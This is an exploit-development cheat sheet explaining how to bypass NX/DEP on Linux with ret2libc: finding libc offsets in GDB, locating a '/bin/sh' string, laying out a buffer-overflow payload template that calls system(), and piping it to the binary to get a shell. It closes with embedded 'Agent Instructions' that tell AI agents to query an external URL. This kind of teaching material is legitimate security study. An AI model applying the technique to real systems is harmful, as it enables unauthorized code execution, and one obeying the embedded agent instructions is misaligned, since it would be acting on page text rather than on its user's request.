# Bypassing NX (DEP) ## Summary NX (NoExecute) is also called DEP (Data Execution Prevention) prevents execution of shellcode on the stack. This prevents the standard buffer overflow method since the shellcode on the memory doesnt get executed. This would result in a SIGSEGV error. To bypass this limitation, you use pointers of things already defined and pass arguments to them, since that is still allowed. ## Ret2Libc LibC is a library on linux by default toi make low level functions work. This is imported in a lot of binaries to function. When the EIP is overwritten as part of the exploit, we can point it to functions in LibC (assuming its imported) and pass args to them to execute code. ### Checking LibC #### Bash ``` ldd ``` #### GDB ``` gdb -q vmmap libc # For this to work you may need to execute the program and have it break somewhere ``` #### Listing functions in the systems LibC ``` nm -D /lib/$(uname -m)-linux-gnu/libc-*.so | grep -vw U | grep -v "_" | cut -d " " -f3 ``` ### Calling a Function When calling a function in LibC, we need to know how to prepare the stack. We will need to have the function address, the return address (such as exit()) and then the arguments for the function. #### Calculating Addresses ``` gdb -q # Get the base address of libc in the process vmmap libc # Get the offset of the function in libc readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "system" # Work out the address in the process p base + offset # Get the value of a function in GDB with no maths p p # Where function could be something like system(), and return exit() Can now place in code payload = '' payload += 'A'*500 payload += '\xFF\xFF\xFF\xFF' # placing address of system here payload += '\xFF\xFF\xFF\xFF' # placing address of return here ``` #### Getting Args The function called will need arguments and they cant be passed along as a normal string. If calling a function such as system() in LibC, then the arg could be a location in memory already including /bin/sh or something similar. ``` gdb -q find /bin # This should return strings in memory. # Hopefully something from LibC will be here and you can use it # If nothing is found quit export SHELL='/bin/sh' gdb -q find /bin # Should now be here on the stack at the bottom from env variable Can now place in code payload = '' payload += 'A'*500 payload += '\xFF\xFF\xFF\xFF' # placing address of system here payload += '\xFF\xFF\xFF\xFF' # placing address of return here payload += '\xFF\xFF\xFF\xFF' # Placing address of string argument here ``` ## Execution Python can either be used to launch it directly, or print it all out to term and then pipe. To use with the double cat method, pipe out to a file (exploit.txt), then use. ``` python exploit.py > exploit.txt (cat ./exploit.txt; cat) | ./binary ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cheats.philkeeble.com/exploit-dev/linux/bypassing-nx-dep.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.